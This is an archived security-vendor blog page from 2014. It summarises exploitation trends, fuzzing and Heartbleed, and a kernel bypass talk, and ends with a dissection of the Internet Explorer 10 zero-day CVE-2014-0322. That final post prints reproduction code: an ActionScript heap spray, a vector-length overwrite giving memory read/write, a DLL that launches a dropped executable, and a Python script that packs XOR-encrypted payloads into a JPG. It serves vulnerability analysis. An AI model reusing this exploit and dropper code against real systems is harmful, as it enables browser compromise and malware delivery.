Skip to content
July 22, 2014 / Br Labs

H1 2014 Endpoint Exploitation Trends

The Bromium Labs team got together and came up with a summary of notable exploitation trends that we observed in the first 6 months of 2014. There were some interesting takeaways:

- Internet Explorer took the cap for historic high number of security patches in over a decade, and that feat was accomplished in the first 6 months of 2014!

- As timelines to the next version of the latest Internet Explorer shrink, time to the next security patches have also shrunk. Expect more to come.

- In 2013, Oracle Java was labeled as the notorious king for malware authors and zero day attacks, exploit kits had a field time with it. Notably, there were no reported zero day exploits targeting Java in H1 2014.

- Adobe Flash continued to be exploited by zero days and also providing attackers with newer avenues to exploit the browser (Internet Explorer).

-  Attackers developed novel ways to attack browsers leveraging ‘Action Script Spray’ to bypass ASLR. This was used by several zero day exploits in the wild.

 

It’s evident that attackers continue to shift focus in between ubiquitous internet facing applications, but there’s a common theme throughout – attacking the end users. Will Java attacks continue to decline this year? Would attackers continue to focus on exploiting Internet Explorer? We’ll soon find out.

 

The full report is available to download here.

 

 

June 10, 2014 / Br Labs

Chrome dances with wolves

  ” Lasker does not play chess, he plays dominoes. ” – David Janowski, 1910

Alice sees her “browser” as the computer, not the network or operating system. This trend will only get stronger as BYOD takes hold. We’re in a brave new world, where traditional security models based on clear boundaries break down. Modern browsers’ cornerstone security approach, same-origin policy, entails significant complexity and controls only a limited subset of cross-domain interactions. Highly granular isolation within this context ends up breaking existing web-apps. In an odd way, one can see flashbacks and parallels to the old MS-DOS era.

Google Chrome is tipped for primacy as the definitive web-browser. They were among the first to deploy separate protection domains that made it more difficult, and perhaps more exciting, for Eve. Chromium architecture assigns the browser kernel to interact with the underlying OS on behalf of the user. It’s rendering engine deals with “the web” via a high-quality sandbox. Thus, historically high-risk components such as the HTML parser, the JavaScript virtual machine, and Document Object Model (DOM) became more difficult to leverage. Overall, Google’s browser is a strong candidate for secure browsing.

However, the state of the art in exploitation is now more dominoes than chess. Eve can bypass the sandbox via techniques ranging from kernel exploits to plugins to get to Alice. We now take a look at what happens with just a few tricks from an evergreen bag.

Let’s install the latest:

win_update

Alice then confidently proceeds to browse to her favorite videos. Unfortunately, Eve has compromised the site and planted an exploit with a custom payload. Conventional layers of defense including AV, sandboxes and firewalls fail to stop the attack:

before_custom

If Alice was protected by vSentry, the attack would have been captured within a micro-VM. Her SOC team would then be able to trace Eve’s tracks via LAVA:

afterannotated

Perhaps, Chrome should dance with Bromium.

June 4, 2014 / Jared DeMott

Application Security Training

Training is an important part of the secure development lifecycle.  It’s something EVERY security conscious organization should be engaged in.  But getting good training that is relevant to your developers and testers, as well as security engineers and researchers is hard to find.  That’s why I developed a full two day course called “Application Security: for Hackers and Developers”.  In the course I cover the 4 pillars of application security: Code auditing, Fuzzing, Reverse Engineering, and Exploit Development.  5 years ago when I realized there was no course that taught all 4 subjects in a balanced and deeply technical manner, I resolved to create one.

Over the last 4 years, I have offered the course to hundreds of students, who afterwards were equipped and energized to face their security threats and research goals.  To give people a small taste of this course, I’ve partnered with BlackHat to offer a free 35min webinar on application security.  The link to join the web training is here: https://www.blackhat.com/html/webcast/06192014-appsec-overview-deep-dive-and-trends.html  The event happens on June 19th, 2014.

I hope you’ll join us for the webcast, and perhaps I’ll see you in Las Vegas for the next offering of the full, hands-on course:

https://www.blackhat.com/us-14/training/application-security-for-hackers-and-developers.html

The training is Aug 2-3 or Aug 4-5, 2014.  Sign up, and keep securing your code!

May 27, 2014 / Vadim Kotov

CryptoDefense: The Ransomware Games have begun

Let the ransomware games begin If you see a text and / or HTML document on your Desktop called HOW_TO_DECRYPT with the following contents: The crypto defense message then you were unfortunate to be a victim of another crypto-ransomware.   Recently, several of our field engineers encountered this piece of ransomware encrypting files on victim machines. This new ransomware is being distributed via Java drive-by-downloads and it’s likely that more victims could be targeted with this new attack vector. We were able to capture the sample inside a micro-VM implemented in our product so we have all the files and traffic involved in the attack. This allows us to skip the Java exploit and 1st layer dropper for now and focus on the actual malware dropped. If we find something noteworthy in other parts of attack we’ll post a follow up article. Read more…

May 14, 2014 / Jared DeMott

Understanding how Fuzzing Relates to a Vulnerability like Heartbleed

Fuzzing is a security-focused testing technique in which a compiled program is executed so that the attack surface can be tested as it actually runs.  The attack surfaces are the components of code that accept user input.  Since this is the most vulnerable part of code, it should be rigorously tested with anomalous data.  During testing, the application is monitored for known bad states, such as an application crash, often the result of an out-of-bounds memory access.  If a crash is found, the input and application state are stored for later review.  Such a flaw will be entered as a security bug for developers to repair.  A high level view fuzzing is shown in Figure 1.

fuzzingoverview

Figure 1: Fuzzing Overview

Fuzzing is often an effective way to find bugs, which are missed by manual and automated code reviews.  Fuzzing also finds real flaws, e.g. not much problem with false positives like automated code auditing tools.  However, fuzzing tends to get shallow penetration for complex protocols, and thus relatively weak code coverage.  This is particularly true for code paths that might require specialized input that is unlikely to be present in automated inputs.  That is why both static and dynamic testing approaches are critical to any well-formed secure development lifecycle (SDL).

I have not been briefed on exactly how the OpenSSL code is secured.  The Heartbleed wiki page specifies how and when the bug was introduced into the code base.  However, the wiki page does not discuss how often code reviews and runtime testing are conducted. It would not be surprising to find out that a vulnerable version of the OpenSSL code had been fuzzed and yet the Heartbleed bug had been missed.  Information disclosure bugs are easy to miss when fuzzing, because there may be no crash associated with this bug.

However, crashes are not the only exceptional condition fuzzers can look for.  Access violations have been popular to search for in the past because they can sometimes lead to host compromise exploits.  But with the rise of low-level systems protections like ASLR (address space layout randomization) leaking memory contents is a growing field of offensive study.  Leaking the contents of memory helps attackers defeat the ASLR protection.  The disclosure was particularly exciting, since cryptographic material could also potentially be leaked.

There are ways that fuzzing tools can observe potential memory leaks.  For example, in the case of a network protocol like OpenSSL, the size of return packets could be recorded, and anything larger than expected should be reported on.  Likewise, if the returned data is of a well-known format, unknown data should also be treated with suspicion.  Also, detecting leaked memory is commonly accomplished by using a debug heap that sets each allocation next to an unmapped page, as shown in Figure 2.

debugheap

Figure 2: Debug Heap

If data is read beyond the scope of one allocation, a page fault will occur.  Not all information leaks occur outside the bounds of an allocated buffer, but this approach is a good start.  Most operating systems have a debug heap, which can be optionally enabled.  It is clear that the heartbeat extension was not fuzzed using a debug heap; else this bug would have been detected.  The beauty of using debug heaps for fuzzing is that your existing tools can continue to focus on catching crashes and they will now find this bug type.  The tradeoff is that the application, and therefore the fuzzer, will run slower.

So was the heartbeat extension not fuzzed at all?  Or was improper technique or tooling used?  Either is likely; both often happen.

  • Overworked testers create fuzzing tools that test most of the protocol, but do not go back and retool fuzzers for each code check-in.  To combat this possibility existing tools that test SSL could be used.  Often times propriety fuzzers are required for special purpose code, but this is a well-documented standard.
  • Improper technique is just as likely: the people charged with testing are smart developers or testers, but may lack critical security training.  That is why many major projects now have a central security team that helps with security testing such as fuzzing.

To close the loop on this bug, the OpenSSL team should determine where the testing failure occurred and address the issue to insure a similar situation does not occur.

April 29, 2014 / Rafal Wojtczuk

“Bypassing endpoint protections” @ BSides London

This week I presented at BSides London. The talk is titled “Layers on layers: bypassing endpoint protection”. The purpose of this talk is to reiterate on the (well-known) common weakness of most endpoint protection products – their reliance on kernel integrity. Once the attacker achieves arbitrary code execution in the kernel, there is no barrier left that would prevent from tampering with kernel-based security software.

Particularly, I will show that by enhancing the public exploit for EPATHOBJ vulnerability with a custom kernel payload, it is possible to break many protections in a generic way. It does not help if multiple products are layered up together - if they all depend on kernel integrity, then a single kernel vulnerability (which are plenty on Windows) can result in the compromise.

In this talk, we stack up various Layers of security technologies and then use the custom kernel exploit to ultimately bypass them all. The layers tested for this presentation are: Anti Virus, Host IPS, App Sandboxes, EMET, Kernel Rootkit Detectors and Intel SMEP.

I think the most interesting pieces of the presentation will be another technique to conveniently bypass SMEP and the overview of methods of injecting code into usermode processes from the kernel (all on Windows platform). The slides explain the technique with more details.

 

P.S: As obvious, no extra effort was needed to bypass AV or EMET as these can’t do much for kernel mode attacks

 

 

February 25, 2014 / Vadim Kotov

Dissecting the newest IE10 0-day exploit (CVE-2014-0322)

Few days ago the news about a fresh Internet Explorer 10 zero-day exploit popped up. Now the exploit code is publicly available and we managed to analyze the vulnerability and find out some details that were not mentioned so far.  At the time of writing this blog, this exploit is still unpatched.

We tested the exploit on Windows 7 SP1 Enterprise 32 bit with several versions of Flash Player (10, 11 and 12). The code provided in the article was derived from the actual exploit but we simplified it and gave some meaningful names to the variables.

General diagram of the attack looks like this:

General overview of the attack

First, let’s see the vulnerability itself. To do that we need to get rid of the flash part and call the vulnerable function explicitly:

<body onLoad = "puIHa3()">

We set up a simple python web server (python.exe –m SimpleHTTPServer 8080) and ran IE10 in WinDbg by issuing this command:

windbg.exe –g –hd –o “C:\Program Files\Internet Explorer\iexplore.exe” http://localhost:8080/ie10_0day.html

Soon after the page loads, the exception occurs somewhere at MSHTML.DLL offset 281b97:

inc dword ptr [eax+10h]

EAX here points at the heap address 0x1a1b2000, the one provided in the exploit code as (0x1a1b2000 – 0×10). Apparently whoever found this vulnerability had figured that it is suited for a Flash based ASLR bypass.

We noticed that in 6-7 cases out of 10, Internet Explorer would crash before reaching the vulnerable condition. It may work better on other versions of Windows, but in our set up it is not very reliable.

The exploitation method is well described here and here.  The exploit leverages the way Action Script 3 Vector class instance is allocated in the memory. The heap spray instances are aligned at 0×1000 boundaries so that when a big enough spray is provided, one of the allocations will end up at 0x1a1b2000 with high probability.  This approach is not reliable, because in the presence of better randomization, the heap may not align.

This piece of the Action Script 3 code:


this.s = new Vector.<Object>(98688);

for (i=0; i < 98688; i++)
{
    this.s[i] = new Vector.<uint>(1022);
    this.s[i][0] = 0xDEADBEE1;
    this.s[i][2] = 0x1a1b2000;
    this.s[i][3] = 0x1a1b2000;
    this.s[i][110] = 0;
    this.s[i][186] = 0x41414141;  
}


produces the following memory layout repeating every 0×1000 bytes:

1a1b2000 fe 03 00 00 00 20 55 0d e1 be ad de  ..... U.....
1a1b200c 00 00 00 00 00 20 1b 1a 00 20 1b 1a  ..... ... ..
*
1a1b12ec 00 00 00 00 41 41 41 41 00 00 00 00  ....AAAA....
1a1b12f8 00 00 00 00 00 00 00 00 00 00 00 00  ............

The way Vector objects are handled is a bit different in the versions of the player prior to 11, so the exploit will not work on Flash 10.

The IE portion of the exploit can increment the doubleword 0x000003FE, which corresponds to the size of the vector.  According to the AS3 documentation a Vector is a dense array, and accesses to its instances are boundary checked. So incrementing the size will allow an attacker to modify one doubleword beyond the vector boundaries. This doubleword is the size of the next vector. Now the attacker can assign it some big number and access the whole process memory.  This creates a R/W exploit primitive, which should allow for a more reliable exploit to be created.

But how does the attacker know which vector was affected by the vulnerability? Or in other words, which element is at 0x1a1b2000? To find this out, the attacker’s AS3 code simply iterates through the parent vector (referenced as this.s in the code above) and stops when the current vector length is bigger than 0x03FE.

Let’s examine how this search procedure looks:

// Looking for affected vector

for (i = 0; i < 0x18180; ++i){     if (this.s[i].length > 1022)
        break;
}

// This element is now writable since
// the length of the vector is 1023

this.s[i][1022] = 0x3FFFFFF0;

Now the next vector element can access 0x3FFFFFF0 bytes of memory starting from its first element.  This enables the exploit to iterate through memory and find the necessary ROP gadgets.To start the exploit, the toString() method of the Sound class is overwritten.

The actual malicious payload is stored in the JPG image that flash downloads and stores as a byte array (which is an array of binary data in AS3).  We don’t have the image so we had to reverse the image format via shellcode analysis. It has the following structure:

  • 36321 bytes of data (possibly legitimate image bytes);
  • 4 bytes size of two payloads (it’s there for decryption purposes);
  • 4 bytes size of the dropper (supposedly a DLL);
  • 4 bytes size of the malware binary;
  • Dropper XOR-encrypted with key 0×95
  • Malware binary XOR-encrypted with key 0×95

First the shellcode decrypts the payloads and then writes both to files (that’s why the sizes of each payload were provided).  The target path is obtained via GetTempPath function. Dropper is named sqlrenew.txt and malware binary stream.exe. After writing data on disk it calls LoadLibrary and passes sqlrenew.txt as an argument.

In order to reproduce the attack we prepared a simple DLL that would execute stream.exe:

#include
#include
#include

#define BUFFLEN 256
#define NAME "\stream.exe"

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    char buf[BUFFLEN];
    int len;
    if (fdwReason == DLL_PROCESS_ATTACH){
        len = GetTempPath(BUFFLEN, buf);
        strncpy(&buf[len], NAME, strlen(NAME));
        WinExec(buf, SW_SHOWNORMAL);
    }
    return TRUE;
};

To test successful exploitation, we took calc.exe as our neutralized payload. Now, we pack everything into the image and we wrote a python script:

import struct

KEY = 0x95
OFFSET = 36321
DLL = 'dll.dll'
MALWARE = 'calc.exe'

def read_file(path):
    fd = open(path, 'rb')
    data = fd.read()
    fd.close()
    return data

def encrypt(data):
    encr_data = []
    for byte_ in data:
        if ord(byte_) == 0 or ord(byte_) == KEY:
            out_byte = byte_
        else:
            out_byte = chr(ord(byte_)^KEY)
        encr_data.append(out_byte)

    return ''.join(encr_data)

outfd = open('Erido.jpg', 'wb')

outfd.write('A'*OFFSET)

dll = read_file(DLL)
mw = read_file(MALWARE)

dll_len = len(dll)
mw_len = len(mw)

total_len_packed = struct.pack('<I', dll_len+mw_len)
dll_len_packed = struct.pack('<I', dll_len)
mw_len_packed = struct.pack('<I', mw_len)

outfd.write (  total_len_packed )
outfd.write (  dll_len_packed )
outfd.write (  mw_len_packed )
outfd.write( encrypt(dll) )
outfd.write( encrypt(mw) )

outfd.close()

Thus the exploit first loads a DLL which calls calc.exe:

Calc.exe launched by exploit

Naturally we managed to test this exploit in vSentry. The attack was successfully detected and isolated. All users using the vSentry product are obviously protected from this attack (and future unseen attacks). Below is the brief LAVA trace which we saw after reproducing the exploit successfully.

Lava graph

Interestingly, we had to do some work to make this exploit work. It would crash before reaching the vulnerability condition, producing an error like this:

eax=00000000 ebx=29e62fa0 ecx=00000000 edx=0f0cecc0 esi=0f0cecc0 edi=0c264f50
eip=66621ba9 esp=0552991c ebp=05529988 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050246
MSHTML+0x281ba9:
66621ba9 83b8c001000000  cmp     dword ptr [eax+1C0h],0 ds:0023:000001c0=????????

We could only make it work after increasing the first allocation by IE from 0×250 to 0×260 in this snippet (arrLen is the variable whose value we changed):

for (a = 0; a < arrLen; ++a) {
    g_arr[a] = document.createElement('div')
};

Furthermore, this exploit would also crash in the middle of Flash DLL in the Player v. 11 despite the correct and seemingly exploitable memory layout.

These little issues further prove the point that either the exploit writers didn’t spend enough time perfecting the exploit or perhaps they were in a hurry to get it deployed? But then again, bad guys don’t need to infect all users, just few are enough to make reasonable profits.

We expect that there is a considerable risk of a more advanced version of this exploit coming up in the wild.  One of Bromium Labs researchers, Jared DeMott, recently discussed how to bypass EMET, which is currently listed as one of the recommended tools to mitigate this zero day exploit.

Follow

Get every new post delivered to your Inbox.

Join 33 other followers